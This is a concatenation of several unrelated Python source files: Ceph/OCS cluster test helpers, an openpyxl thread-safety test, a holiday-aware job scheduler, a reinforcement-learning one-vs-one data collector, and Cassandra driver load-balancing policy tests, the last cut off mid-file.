list: List of the rook ceph pod names
"""
rook_ceph_pod_names = get_pod_name_by_pattern("rook-ceph-")
# Exclude the rook ceph pod tools because it creates by OCS and not rook ceph operator
return [
pod_name
for pod_name in rook_ceph_pod_names
if not pod_name.startswith("rook-ceph-tools-")
]
def get_mon_pod_id(mon_pod):
"""
Get the mon pod id
Args:
mon_pod (ocs_ci.ocs.resources.pod.Pod): The mon pod object
Returns:
str: The mon pod id
"""
return mon_pod.get().get("metadata").get("labels").get("ceph_daemon_id")
def delete_all_osd_removal_jobs(namespace=defaults.ROOK_CLUSTER_NAMESPACE):
"""
Delete all the osd removal jobs in a specific namespace
Args:
namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
bool: True, if all the jobs deleted successfully. False, otherwise
"""
result = True
osd_removal_jobs = get_jobs_with_prefix("ocs-osd-removal-", namespace=namespace)
for osd_removal_job in osd_removal_jobs:
osd_removal_job.delete()
try:
osd_removal_job.ocp.wait_for_delete(resource_name=osd_removal_job.name)
except TimeoutError:
logger.warning(
f"{osd_removal_job.name} job did not get deleted successfully"
)
result = False
return result
|
long_dump_thread.py | # Copyright (c) 2010-2011 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
import threading
from openpyxl.workbook import Workbook
from openpyxl.shared.compat import StringIO
def test_thread_safe_dump():
def dump_workbook():
wb = Workbook(optimized_write=True)
ws = wb.create_sheet()
ws.append(range(30))
wb.save(filename=StringIO())
for thread_idx in range(400):
thread = threading.Thread(target=dump_workbook)
thread.start()
print("starting thread %d" % thread_idx)
|
scheduling.py | import schedule
import threading
import time
import datetime
class JobSchedule(object):
SECOND = 0
MINUTE = 1
HOUR = 2
DAY = 3
WEEK = 4
NEW_YEAR = "0101"
EPIPHANY = "0106"
LIBERATION = "0425"
LABOUR_DAY = "0501"
REPUBLIC_DAY = "0206"
ASSUMPTION_DAY = "0815"
ALL_SAINTS = "1101"
IMMACULATE_DAY = "1208"
CHRISTMAS = "1225"
STEPHEN = "1226"
def __init__(self, job, time_schedule, repetition, static_holiday, *args):
self.job = job
self.args = args
self.time_schedule = time_schedule
self.repetition = repetition
self.static_holiday = static_holiday
class SchedulingError(Exception):
def __init__(self, message):
super().__init__(message)
class ScheduleManager(object):
manager = schedule.Scheduler()
def __init__(self, jobs: list, jobs_static_holidays: list):
"""
Constructor with a jobs list to schedule
:param jobs: a list of JobSchedule
"""
self.jobs = jobs
self.static_jobs = jobs_static_holidays
t = threading.Thread(target=self.__init_jobs)
t1 = threading.Thread(target=self.__init_static_holidays_jobs)
t.start()
t1.start()
def __init_jobs(self):
for job in self.jobs:
if isinstance(job, JobSchedule):
if job.repetition == JobSchedule.SECOND:
self.manager.every(job.time_schedule).seconds.do(job.job, *job.args)
elif job.repetition == JobSchedule.MINUTE:
self.manager.every(job.time_schedule).minutes.do(job.job, *job.args)
elif job.repetition == JobSchedule.HOUR:
self.manager.every(job.time_schedule).hours.do(job.job, *job.args)
elif job.repetition == JobSchedule.DAY:
self.manager.every(job.time_schedule).days.do(job.job, *job.args)
elif job.repetition == JobSchedule.WEEK:
self.manager.every(7).days.do(job.job, *job.args)
else:
raise SchedulingError("Job repetition not valid.")
else:
raise SchedulingError("Error: job in job list is not an instance of JobSchedule")
def __init_static_holidays_jobs(self):
for sj in self.static_jobs:
if isinstance(sj, JobSchedule):
self.check_static_holidays(job=sj)
else:
raise SchedulingError("Error: job in job list is not an instance of JobSchedule")
def check_static_holidays(self, job: JobSchedule):
now = datetime.datetime.now().date()
if (job.static_holiday == JobSchedule.NEW_YEAR and now.month == 1 and now.day == 1) or\
(job.static_holiday == JobSchedule.EPIPHANY and now.month == 1 and now.day == 6):
self.__start_check_on_thread(job)
elif job.static_holiday == JobSchedule.LIBERATION and now.month == 4 and now.day == 25:
self.__start_check_on_thread(job)
elif job.static_holiday == JobSchedule.LABOUR_DAY and now.month == 5 and now.day == 1:
self.__start_check_on_thread(job)
elif job.static_holiday == JobSchedule.REPUBLIC_DAY and now.month == 6 and now.day == 2:
self.__start_check_on_thread(job)
elif job.static_holiday == JobSchedule.ASSUMPTION_DAY and now.month == 8 and now.day == 15:
self.__start_check_on_thread(job)
elif job.static_holiday == JobSchedule.ALL_SAINTS and now.month == 11 and now.day == 1:
self.__start_check_on_thread(job)
elif now.month == 12 and ((job.static_holiday == JobSchedule.IMMACULATE_DAY and now.day == 8) or\
(job.static_holiday == JobSchedule.CHRISTMAS and now.day == 25 ) or\
(job.static_holiday == JobSchedule.STEPHEN and now.day == 26)):
self.__start_check_on_thread(job)
def __start_check_on_thread(self, job: JobSchedule):
t = threading.Thread(target=job.job, args=job.args)
t.start()
def run_checks(self):
while True:
self.manager.run_pending()
time.sleep(1) |
one_vs_one_collector.py | from typing import Dict, Any, List
import copy
import time
import uuid
from collections import namedtuple
from threading import Thread
from functools import partial
import numpy as np
import torch
from easydict import EasyDict
from ding.policy import create_policy, Policy
from ding.envs import get_vec_env_setting, create_env_manager
from ding.utils import get_data_compressor, pretty_print, PARALLEL_COLLECTOR_REGISTRY
from ding.envs import BaseEnvTimestep, BaseEnvManager
from .base_parallel_collector import BaseCollector
from .base_serial_collector import CachePool, TrajBuffer
INF = float("inf")
@PARALLEL_COLLECTOR_REGISTRY.register('one_vs_one')
class OneVsOneCollector(BaseCollector):
"""
Feature:
- one policy or two policies, many envs
- async envs(step + reset)
- batch network eval
- different episode length env
- periodic policy update
- metadata + stepdata
"""
config = dict(
print_freq=5,
compressor='lz4',
update_policy_second=3,
# The following keys is set by the commander
# env
# policy
# collect_setting
# eval_flag
# policy_update_path
)
# override
def __init__(self, cfg: dict) -> None:
super().__init__(cfg)
self._update_policy_thread = Thread(
target=self._update_policy_periodically, args=(), name='update_policy', daemon=True
)
self._start_time = time.time()
self._compressor = get_data_compressor(self._cfg.compressor)
# create env
self._env_cfg = self._cfg.env
env_manager = self._setup_env_manager(self._env_cfg)
self.env_manager = env_manager
# create policy
if self._eval_flag:
assert len(self._cfg.policy) == 1
policy = [create_policy(self._cfg.policy[0], enable_field=['eval']).eval_mode]
self.policy = policy
self._policy_is_active = [None]
self._policy_iter = [None]
self._traj_buffer_length = self._traj_len if self._traj_len != INF else None
self._traj_buffer = {env_id: [TrajBuffer(self._traj_len)] for env_id in range(self._env_num)}
else:
assert len(self._cfg.policy) == 2
policy = [create_policy(self._cfg.policy[i], enable_field=['collect']).collect_mode for i in range(2)]
self.policy = policy
self._policy_is_active = [None for _ in range(2)]
self._policy_iter = [None for _ in range(2)]
self._traj_buffer_length = self._traj_len if self._traj_len != INF else None
self._traj_buffer = {
env_id: [TrajBuffer(self._traj_buffer_length) for _ in range(len(policy))]
for env_id in range(self._env_num)
}
# self._first_update_policy = True
self._episode_result = [[] for k in range(self._env_num)]
self._obs_pool = CachePool('obs', self._env_num)
self._policy_output_pool = CachePool('policy_output', self._env_num)
self._total_step = 0
self._total_sample = 0
self._total_episode = 0
@property
def policy(self) -> List[Policy]:
return self._policy
# override
@policy.setter
def policy(self, _policy: List[Policy]) -> None:
self._policy = _policy
self._n_episode = _policy[0].get_attribute('cfg').collect.get('n_episode', None)
self._n_sample = _policy[0].get_attribute('cfg').collect.get('n_sample', None)
assert any(
[t is None for t in [self._n_sample, self._n_episode]]
), "n_episode/n_sample in policy cfg can't be not None at the same time"
# TODO(nyz) the same definition of traj_len in serial and parallel
if self._n_episode is not None:
self._traj_len = INF
elif self._n_sample is not None:
self._traj_len = self._n_sample
@property
def env_manager(self, _env_manager) -> None:
self._env_manager = _env_manager
# override
@env_manager.setter
def env_manager(self, _env_manager: BaseEnvManager) -> None:
self._env_manager = _env_manager
self._env_manager.launch()
self._env_num = self._env_manager.env_num
self._predefined_episode_count = self._env_num * self._env_manager._episode_num
def _setup_env_manager(self, cfg: EasyDict) -> BaseEnvManager:
env_fn, collector_env_cfg, evaluator_env_cfg = get_vec_env_setting(cfg)
if self._eval_flag:
env_cfg = evaluator_env_cfg
else:
env_cfg = collector_env_cfg
env_manager = create_env_manager(cfg.manager, [partial(env_fn, cfg=c) for c in env_cfg])
return env_manager
def _start_thread(self) -> None:
# evaluator doesn't need to update policy periodically, only updating policy when starts
if not self._eval_flag:
self._update_policy_thread.start()
def _join_thread(self) -> None:
if not self._eval_flag:
self._update_policy_thread.join()
del self._update_policy_thread
# override
def close(self) -> None:
if self._end_flag:
return
self._end_flag = True
time.sleep(1)
if hasattr(self, '_env_manager'):
self._env_manager.close()
self._join_thread()
# override
def _policy_inference(self, obs: Dict[int, Any]) -> Dict[int, Any]:
env_ids = list(obs.keys())
if len(self._policy) > 1:
assert not self._eval_flag
obs = [{id: obs[id][i] for id in env_ids} for i in range(len(self._policy))]
else:
assert self._eval_flag
obs = [obs]
self._obs_pool.update(obs)
policy_outputs = []
for i in range(len(self._policy)):
if self._eval_flag:
policy_output = self._policy[i].forward(obs[i])
else:
policy_output = self._policy[i].forward(obs[i], **self._cfg.collect_setting)
policy_outputs.append(policy_output)
self._policy_output_pool.update(policy_outputs)
actions = {}
for env_id in env_ids:
action = [policy_outputs[i][env_id]['action'] for i in range(len(self._policy))]
action = torch.stack(action).squeeze()
actions[env_id] = action
return actions
# override
def _env_step(self, actions: Dict[int, Any]) -> Dict[int, Any]:
return self._env_manager.step(actions)
# override
def _process_timestep(self, timestep: Dict[int, namedtuple]) -> None:
for env_id, t in timestep.items():
if t.info.get('abnormal', False):
# If there is an abnormal timestep, reset all the related variables, also this env has been reset
for c in self._traj_buffer[env_id]:
c.clear()
self._obs_pool.reset(env_id)
self._policy_output_pool.reset(env_id)
for p in self._policy:
p.reset([env_id])
continue
self._total_step += 1
t = [BaseEnvTimestep(t.obs[i], t.reward[i], t.done, t.info) for i in range(len(self._policy))]
if t[0].done:
self._total_episode += 1
if not self._eval_flag:
for i in range(len(self._policy)):
if self._policy_is_active[i]:
# Only active policy will store transition into replay buffer.
transition = self._policy[i].process_transition(
self._obs_pool[env_id][i], self._policy_output_pool[env_id][i], t[i]
)
self._traj_buffer[env_id][i].append(transition)
full_indices = []
for i in range(len(self._traj_buffer[env_id])):
if len(self._traj_buffer[env_id][i]) == self._traj_len:
full_indices.append(i)
if t[0].done or len(full_indices) > 0:
for i in full_indices:
train_sample = self._policy[i].get_train_sample(self._traj_buffer[env_id][i])
for s in train_sample:
s = self._compressor(s)
self._total_sample += 1
metadata = self._get_metadata(s, env_id)
self.send_stepdata(metadata['data_id'], s)
self.send_metadata(metadata)
self._traj_buffer[env_id][i].clear()
if t[0].done:
# env reset is done by env_manager automatically
self._obs_pool.reset(env_id)
self._policy_output_pool.reset(env_id)
for p in self._policy:
p.reset([env_id])
reward = t[0].info['final_eval_reward']
# Only left player's reward will be recorded.
left_reward = reward[0]
if isinstance(left_reward, torch.Tensor):
left_reward = left_reward.item()
self._episode_result[env_id].append(left_reward)
self.debug(
"Env {} finish episode, final reward: {}, collected episode: {}.".format(
env_id, reward, len(self._episode_result[env_id])
)
)
self._total_step += 1
dones = [t.done for t in timestep.values()]
if any(dones):
collector_info = self._get_collector_info()
self.send_metadata(collector_info)
# override
def get_finish_info(self) -> dict:
duration = max(time.time() - self._start_time, 1e-8)
game_result = copy.deepcopy(self._episode_result)
for i, env_result in enumerate(game_result):
for j, rew in enumerate(env_result):
if rew < 0:
game_result[i][j] = "losses"
elif rew == 0:
game_result[i][j] = "draws"
else:
game_result[i][j] = "wins"
finish_info = {
# 'finished_task': True, # flag
'eval_flag': self._eval_flag,
# 'episode_num': self._episode_num,
'env_num': self._env_num,
'duration': duration,
'collector_done': self._env_manager.done,
'predefined_episode_count': self._predefined_episode_count,
'real_episode_count': self._total_episode,
'step_count': self._total_step,
'sample_count': self._total_sample,
'avg_time_per_episode': duration / max(1, self._total_episode),
'avg_time_per_step': duration / self._total_step,
'avg_time_per_train_sample': duration / max(1, self._total_sample),
'avg_step_per_episode': self._total_step / max(1, self._total_episode),
'avg_sample_per_episode': self._total_sample / max(1, self._total_episode),
'reward_mean': np.mean(self._episode_result),
'reward_std': np.std(self._episode_result),
'reward_raw': self._episode_result,
'finish_time': time.time(),
'game_result': game_result,
}
if not self._eval_flag:
finish_info['collect_setting'] = self._cfg.collect_setting
self._logger.info('\nFINISH INFO\n{}'.format(pretty_print(finish_info, direct_print=False)))
return finish_info
# override
def _update_policy(self) -> None:
path = self._cfg.policy_update_path
self._policy_is_active = self._cfg.policy_update_flag
for i in range(len(path)):
# if not self._first_update_policy and not self._policy_is_active[i]:
if not self._policy_is_active[i]:
# For the first time, all policies should be updated(i.e. initialized);
# For other times, only active player's policies should be updated.
continue
while True:
try:
policy_update_info = self.get_policy_update_info(path[i])
break
except Exception as e:
self.error('Policy {} update error: {}'.format(i + 1, e))
time.sleep(1)
if policy_update_info is None:
continue
self._policy_iter[i] = policy_update_info.pop('iter')
self._policy[i].load_state_dict(policy_update_info)
self.debug('Update policy {} with {}(iter{}) in {}'.format(i + 1, path, self._policy_iter, time.time()))
# self._first_update_policy = False
# ******************************** thread **************************************
def _update_policy_periodically(self) -> None:
last = time.time()
while not self._end_flag:
cur = time.time()
interval = cur - last
if interval < self._cfg.update_policy_second:
time.sleep(self._cfg.update_policy_second * 0.1)
continue
else:
self._update_policy()
last = time.time()
time.sleep(0.1)
def _get_metadata(self, stepdata: List, env_id: int) -> dict:
data_id = "env_{}_{}".format(env_id, str(uuid.uuid1()))
metadata = {
'eval_flag': self._eval_flag,
'data_id': data_id,
'env_id': env_id,
'policy_iter': self._policy_iter,
'unroll_len': len(stepdata),
'compressor': self._cfg.compressor,
'get_data_time': time.time(),
# TODO(nyz) the relationship between traj priority and step priority
'priority': 1.0,
'cur_episode': self._total_episode,
'cur_sample': self._total_sample,
'cur_step': self._total_step,
}
return metadata
def _get_collector_info(self) -> dict:
return {
'eval_flag': self._eval_flag,
'get_info_time': time.time(),
'collector_done': self._env_manager.done,
'cur_episode': self._total_episode,
'cur_sample': self._total_sample,
'cur_step': self._total_step,
}
def __repr__(self) -> str:
return "OneVsOneCollector"
|
test_policies.py | # Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from itertools import islice, cycle
from mock import Mock
from random import randint
import six
import sys
import struct
from threading import Thread
from cassandra import ConsistencyLevel
from cassandra.cluster import Cluster
from cassandra.metadata import Metadata
from cassandra.policies import (RoundRobinPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy,
TokenAwarePolicy, SimpleConvictionPolicy,
HostDistance, ExponentialReconnectionPolicy,
RetryPolicy, WriteType,
DowngradingConsistencyRetryPolicy, ConstantReconnectionPolicy,
LoadBalancingPolicy, ConvictionPolicy, ReconnectionPolicy, FallthroughRetryPolicy)
from cassandra.pool import Host
from cassandra.query import Statement
from six.moves import xrange
class LoadBalancingPolicyTest(unittest.TestCase):
def test_non_implemented(self):
"""
Code coverage for interface-style base class
"""
policy = LoadBalancingPolicy()
host = Host("ip1", SimpleConvictionPolicy)
host.set_location_info("dc1", "rack1")
self.assertRaises(NotImplementedError, policy.distance, host)
self.assertRaises(NotImplementedError, policy.populate, None, host)
self.assertRaises(NotImplementedError, policy.make_query_plan)
self.assertRaises(NotImplementedError, policy.on_up, host)
self.assertRaises(NotImplementedError, policy.on_down, host)
self.assertRaises(NotImplementedError, policy.on_add, host)
self.assertRaises(NotImplementedError, policy.on_remove, host)
def test_instance_check(self):
self.assertRaises(TypeError, Cluster, load_balancing_policy=RoundRobinPolicy)
class RoundRobinPolicyTest(unittest.TestCase):
def test_basic(self):
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), hosts)
def test_multiple_query_plans(self):
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
for i in xrange(20):
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), hosts)
def test_single_host(self):
policy = RoundRobinPolicy()
policy.populate(None, [0])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [0])
def test_status_updates(self):
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
policy.on_down(0)
policy.on_remove(1)
policy.on_up(4)
policy.on_add(5)
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), [2, 3, 4, 5])
def test_thread_safety(self):
hosts = range(100)
policy = RoundRobinPolicy()
policy.populate(None, hosts)
def check_query_plan():
for i in range(100):
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), hosts)
threads = [Thread(target=check_query_plan) for i in range(4)]
map(lambda t: t.start(), threads)
map(lambda t: t.join(), threads)
def test_thread_safety_during_modification(self):
hosts = range(100)
policy = RoundRobinPolicy()
policy.populate(None, hosts)
errors = []
def check_query_plan():
try:
for i in xrange(100):
list(policy.make_query_plan())
except Exception as exc:
errors.append(exc)
def host_up():
for i in xrange(1000):
policy.on_up(randint(0, 99))
def host_down():
for i in xrange(1000):
policy.on_down(randint(0, 99))
threads = []
for i in range(5):
threads.append(Thread(target=check_query_plan))
threads.append(Thread(target=host_up))
threads.append(Thread(target=host_down))
# make the GIL switch after every instruction, maximizing
# the chance of race conditions
check = six.PY2 or '__pypy__' in sys.builtin_module_names
if check:
original_interval = sys.getcheckinterval()
else:
original_interval = sys.getswitchinterval()
try:
if check:
sys.setcheckinterval(0)
else:
sys.setswitchinterval(0.0001)
map(lambda t: t.start(), threads)
map(lambda t: t.join(), threads)
finally:
if check:
sys.setcheckinterval(original_interval)
else:
sys.setswitchinterval(original_interval)
if errors:
self.fail("Saw errors: %s" % (errors,))
def test_no_live_nodes(self):
"""
Ensure query plan for a downed cluster will execute without errors
"""
hosts = [0, 1, 2, 3]
policy = RoundRobinPolicy()
policy.populate(None, hosts)
for i in range(4):
policy.on_down(i)
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
class DCAwareRoundRobinPolicyTest(unittest.TestCase):
def test_no_remote(self):
hosts = []
for i in range(4):
h = Host(i, SimpleConvictionPolicy)
h.set_location_info("dc1", "rack1")
hosts.append(h)
policy = DCAwareRoundRobinPolicy("dc1")
policy.populate(None, hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(sorted(qplan), sorted(hosts))
def test_with_remotes(self):
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
local_hosts = set(h for h in hosts if h.datacenter == "dc1")
remote_hosts = set(h for h in hosts if h.datacenter != "dc1")
# allow all of the remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=2)
policy.populate(Mock(), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), local_hosts)
self.assertEqual(set(qplan[2:]), remote_hosts)
# allow only one of the remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), local_hosts)
used_remotes = set(qplan[2:])
self.assertEqual(1, len(used_remotes))
self.assertIn(qplan[2], remote_hosts)
# allow no remote hosts to be used
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
policy.populate(Mock(), hosts)
qplan = list(policy.make_query_plan())
self.assertEqual(2, len(qplan))
self.assertEqual(local_hosts, set(qplan))
def test_get_distance(self):
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=0)
host = Host("ip1", SimpleConvictionPolicy)
host.set_location_info("dc1", "rack1")
policy.populate(Mock(), [host])
self.assertEqual(policy.distance(host), HostDistance.LOCAL)
# used_hosts_per_remote_dc is set to 0, so ignore it
remote_host = Host("ip2", SimpleConvictionPolicy)
remote_host.set_location_info("dc2", "rack1")
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# dc2 isn't registered in the policy's live_hosts dict
policy.used_hosts_per_remote_dc = 1
self.assertEqual(policy.distance(remote_host), HostDistance.IGNORED)
# make sure the policy has both dcs registered
policy.populate(Mock(), [host, remote_host])
self.assertEqual(policy.distance(remote_host), HostDistance.REMOTE)
# since used_hosts_per_remote_dc is set to 1, only the first
# remote host in dc2 will be REMOTE, the rest are IGNORED
second_remote_host = Host("ip3", SimpleConvictionPolicy)
second_remote_host.set_location_info("dc2", "rack1")
policy.populate(Mock(), [host, remote_host, second_remote_host])
distances = set([policy.distance(remote_host), policy.distance(second_remote_host)])
self.assertEqual(distances, set([HostDistance.REMOTE, HostDistance.IGNORED]))
def test_status_updates(self):
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(), hosts)
policy.on_down(hosts[0])
policy.on_remove(hosts[2])
new_local_host = Host(4, SimpleConvictionPolicy)
new_local_host.set_location_info("dc1", "rack1")
policy.on_up(new_local_host)
new_remote_host = Host(5, SimpleConvictionPolicy)
new_remote_host.set_location_info("dc9000", "rack1")
policy.on_add(new_remote_host)
# we now have two local hosts and two remote hosts in separate dcs
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan[:2]), set([hosts[1], new_local_host]))
self.assertEqual(set(qplan[2:]), set([hosts[3], new_remote_host]))
# since we have hosts in dc9000, the distance shouldn't be IGNORED
self.assertEqual(policy.distance(new_remote_host), HostDistance.REMOTE)
policy.on_down(new_local_host)
policy.on_down(hosts[1])
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan), set([hosts[3], new_remote_host]))
policy.on_down(new_remote_host)
policy.on_down(hosts[3])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
def test_modification_during_generation(self):
hosts = [Host(i, SimpleConvictionPolicy) for i in range(4)]
for h in hosts[:2]:
h.set_location_info("dc1", "rack1")
for h in hosts[2:]:
h.set_location_info("dc2", "rack1")
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=3)
policy.populate(Mock(), hosts)
# The general concept here is to change thee internal state of the
# policy during plan generation. In this case we use a grey-box
# approach that changes specific things during known phases of the
# generator.
new_host = Host(4, SimpleConvictionPolicy)
new_host.set_location_info("dc1", "rack1")
# new local before iteration
plan = policy.make_query_plan()
policy.on_up(new_host)
# local list is not bound yet, so we get to see that one
self.assertEqual(len(list(plan)), 3 + 2)
# remove local before iteration
plan = policy.make_query_plan()
policy.on_down(new_host)
# local list is not bound yet, so we don't see it
self.assertEqual(len(list(plan)), 2 + 2)
# new local after starting iteration
plan = policy.make_query_plan()
next(plan)
policy.on_up(new_host)
# local list was is bound, and one consumed, so we only see the other original
self.assertEqual(len(list(plan)), 1 + 2)
# remove local after traversing available
plan = policy.make_query_plan()
for _ in range(3):
next(plan)
policy.on_down(new_host)
# we should be past the local list
self.assertEqual(len(list(plan)), 0 + 2)
# REMOTES CHANGE
new_host.set_location_info("dc2", "rack1")
# new remote after traversing local, but not starting remote
plan = policy.make_query_plan()
for _ in range(2):
next(plan)
policy.on_up(new_host)
# list is updated before we get to it
self.assertEqual(len(list(plan)), 0 + 3)
# remove remote after traversing local, but not starting remote
plan = policy.make_query_plan()
for _ in range(2):
next(plan)
policy.on_down(new_host)
# list is updated before we get to it
self.assertEqual(len(list(plan)), 0 + 2)
# new remote after traversing local, and starting remote
plan = policy.make_query_plan()
for _ in range(3):
next(plan)
policy.on_up(new_host)
# slice is already made, and we've consumed one
self.assertEqual(len(list(plan)), 0 + 1)
# remove remote after traversing local, and starting remote
plan = policy.make_query_plan()
for _ in range(3):
next(plan)
policy.on_down(new_host)
# slice is created with all present, and we've consumed one
self.assertEqual(len(list(plan)), 0 + 2)
# local DC disappears after finishing it, but not starting remote
plan = policy.make_query_plan()
for _ in range(2):
next(plan)
policy.on_down(hosts[0])
policy.on_down(hosts[1])
# dict traversal starts as normal
self.assertEqual(len(list(plan)), 0 + 2)
policy.on_up(hosts[0])
policy.on_up(hosts[1])
# PYTHON-297 addresses the following cases, where DCs come and go
# during generation
# local DC disappears after finishing it, and starting remote
plan = policy.make_query_plan()
for _ in range(3):
next(plan)
policy.on_down(hosts[0])
policy.on_down(hosts[1])
# dict traversal has begun and consumed one
self.assertEqual(len(list(plan)), 0 + 1)
policy.on_up(hosts[0])
policy.on_up(hosts[1])
# remote DC disappears after finishing local, but not starting remote
plan = policy.make_query_plan()
for _ in range(2):
next(plan)
policy.on_down(hosts[2])
policy.on_down(hosts[3])
# nothing left
self.assertEqual(len(list(plan)), 0 + 0)
policy.on_up(hosts[2])
policy.on_up(hosts[3])
# remote DC disappears while traversing it
plan = policy.make_query_plan()
for _ in range(3):
next(plan)
policy.on_down(hosts[2])
policy.on_down(hosts[3])
# we continue with remainder of original list
self.assertEqual(len(list(plan)), 0 + 1)
policy.on_up(hosts[2])
policy.on_up(hosts[3])
another_host = Host(5, SimpleConvictionPolicy)
another_host.set_location_info("dc3", "rack1")
new_host.set_location_info("dc3", "rack1")
# new DC while traversing remote
plan = policy.make_query_plan()
for _ in range(3):
next(plan)
policy.on_up(new_host)
policy.on_up(another_host)
# we continue with remainder of original list
self.assertEqual(len(list(plan)), 0 + 1)
# remote DC disappears after finishing it
plan = policy.make_query_plan()
for _ in range(3):
next(plan)
last_host_in_this_dc = next(plan)
if last_host_in_this_dc in (new_host, another_host):
down_hosts = [new_host, another_host]
else:
down_hosts = hosts[2:]
for h in down_hosts:
policy.on_down(h)
# the last DC has two
self.assertEqual(len(list(plan)), 0 + 2)
def test_no_live_nodes(self):
"""
Ensure query plan for a downed cluster will execute without errors
"""
hosts = []
for i in range(4):
h = Host(i, SimpleConvictionPolicy)
h.set_location_info("dc1", "rack1")
hosts.append(h)
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(Mock(), hosts)
for host in hosts:
policy.on_down(host)
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
def test_no_nodes(self):
"""
Ensure query plan for an empty cluster will execute without errors
"""
policy = DCAwareRoundRobinPolicy("dc1", used_hosts_per_remote_dc=1)
policy.populate(None, [])
qplan = list(policy.make_query_plan())
self.assertEqual(qplan, [])
def test_default_dc(self):
host_local = Host(1, SimpleConvictionPolicy, 'local')
host_remote = Host(2, SimpleConvictionPolicy, 'remote')
host_none = Host(1, SimpleConvictionPolicy)
# contact point is '1'
cluster = Mock(contact_points_resolved=[1])
# contact DC first
policy = DCAwareRoundRobinPolicy()
policy.populate(cluster, [host_none])
self.assertFalse(policy.local_dc)
policy.on_add(host_local)
policy.on_add(host_remote)
self.assertNotEqual(policy.local_dc, host_remote.datacenter)
self.assertEqual(policy.local_dc, host_local.datacenter)
# contact DC second
policy = DCAwareRoundRobinPolicy()
policy.populate(cluster, [host_none])
self.assertFalse(policy.local_dc)
policy.on_add(host_remote)
policy.on_add(host_local)
self.assertNotEqual(policy.local_dc, host_remote.datacenter)
self.assertEqual(policy.local_dc, host_local.datacenter)
# no DC
policy = DCAwareRoundRobinPolicy()
policy.populate(cluster, [host_none])
self.assertFalse(policy.local_dc)
policy.on_add(host_none)
self.assertFalse(policy.local_dc)
# only other DC
policy = DCAwareRoundRobinPolicy()
policy.populate(cluster, [host_none])
self.assertFalse(policy.local_dc)
policy.on_add(host_remote)
self.assertFalse(policy.local_dc)
class TokenAwarePolicyTest(unittest.TestCase):
def test_wrap_round_robin(self):
cluster = Mock(spec=Cluster)
cluster.metadata = Mock(spec=Metadata)
hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)]
for host in hosts:
host.set_up()
def get_replicas(keyspace, packed_key):
index = struct.unpack('>i', packed_key)[0]
return list(islice(cycle(hosts), index, index + 2))
cluster.metadata.get_replicas.side_effect = get_replicas
policy = TokenAwarePolicy(RoundRobinPolicy())
policy.populate(cluster, hosts)
for i in range(4):
query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name')
qplan = list(policy.make_query_plan(None, query))
replicas = get_replicas(None, struct.pack('>i', i))
other = set(h for h in hosts if h not in replicas)
self.assertEqual(replicas, qplan[:2])
self.assertEqual(other, set(qplan[2:]))
# Should use the secondary policy
for i in range(4):
qplan = list(policy.make_query_plan())
self.assertEqual(set(qplan), set(hosts))
